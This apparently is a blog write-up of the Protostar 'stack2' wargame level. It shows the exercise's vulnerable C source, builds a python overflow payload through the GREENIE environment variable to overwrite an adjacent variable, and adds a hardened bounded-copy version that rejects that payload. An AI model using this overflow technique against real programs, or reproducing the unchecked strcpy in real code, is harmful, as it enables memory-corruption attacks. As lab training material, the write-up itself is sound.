Protostar - stack2

This is my third post on the Protostar series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:

About

Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}



I start by running the program:


$ ./stack2
stack2: please set the GREENIE environment variable

$ 

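As expected, the program exits because the GREENIE variable is not set.

Looking at the source code, the value of the GREENIE environment variable is copied into buffer with strcpy, which does no bounds checking. Our goal is to set GREENIE to 64 bytes that fill buffer, followed by four more bytes that overwrite modified with 0x0d0a0d0a. The machine is little-endian, so those four bytes go in reverse order: \x0a\x0d\x0a\x0d.

To do this, we first write our payload to a file: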

$ python -c 'print "A" * 64 + "\x0a\x0d\x0a\x0d"' > /tmp/payload
$ cat /tmp/payload
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


$ 

Next, we set our GREENIE variable to the contents of /tmp/payload and export it, so that stack2 sees it in its environment.

$ GREENIE=$(cat /tmp/payload)
$ export GREENIE
$ echo $GREENIE
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
$ 

With everything in place, we run the program:


$ ./stack2
you have correctly modified the variable
$ 

Success!
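
For contrast, here is a bounded version of the copy in stack2 that refuses the payload above instead of letting it reach modified. This is an added example, not part of the challenge source; the names copy_env_value, check_greenie and page_payload are made up for illustration, and the payload is rebuilt inline as constructed sample input.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 64
enum { ENV_OK = 0, ENV_UNSET = -1, ENV_TOO_LONG = -2 };

/* Same locals as stack2, in a struct so `modified` sits right after `buffer`. */
struct frame { char buffer[BUF_LEN]; int modified; };

/* Copy val into dst only if it fits together with its NUL terminator.
 * Oversized input is rejected, not truncated, so the caller can fail closed. */
int copy_env_value(char *dst, size_t dstlen, const char *val)
{
    if (val == NULL)
        return ENV_UNSET;
    size_t len = strlen(val);
    if (len >= dstlen)
        return ENV_TOO_LONG;
    memcpy(dst, val, len + 1);
    return ENV_OK;
}

struct result { int status; int modified; };

/* Hardened equivalent of stack2's body: val is what getenv("GREENIE") returned. */
struct result check_greenie(const char *val)
{
    struct frame f = { .modified = 0 };
    struct result r = { copy_env_value(f.buffer, sizeof f.buffer, val), 0 };
    r.modified = f.modified;   /* still 0 unless the copy wrote past buffer */
    return r;
}

/* Constructed sample input: the page's payload, 64 'A's then 0a 0d 0a 0d. */
const char *page_payload(void)
{
    static char p[BUF_LEN + 5];
    memset(p, 'A', BUF_LEN);
    memcpy(p + BUF_LEN, "\x0a\x0d\x0a\x0d", 5);  /* 4 bytes + NUL */
    return p;
}

int main(void)
{
    struct result r = check_greenie(getenv("GREENIE"));
    printf("status=%d modified=0x%08x\n", r.status, (unsigned)r.modified);
    return r.status == ENV_OK ? 0 : 1;
}
```

Run with the exported GREENIE from above, this prints status=-2 and modified stays 0x00000000; any value of 63 bytes or fewer is copied normally.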

Thanks for reading.

-geoda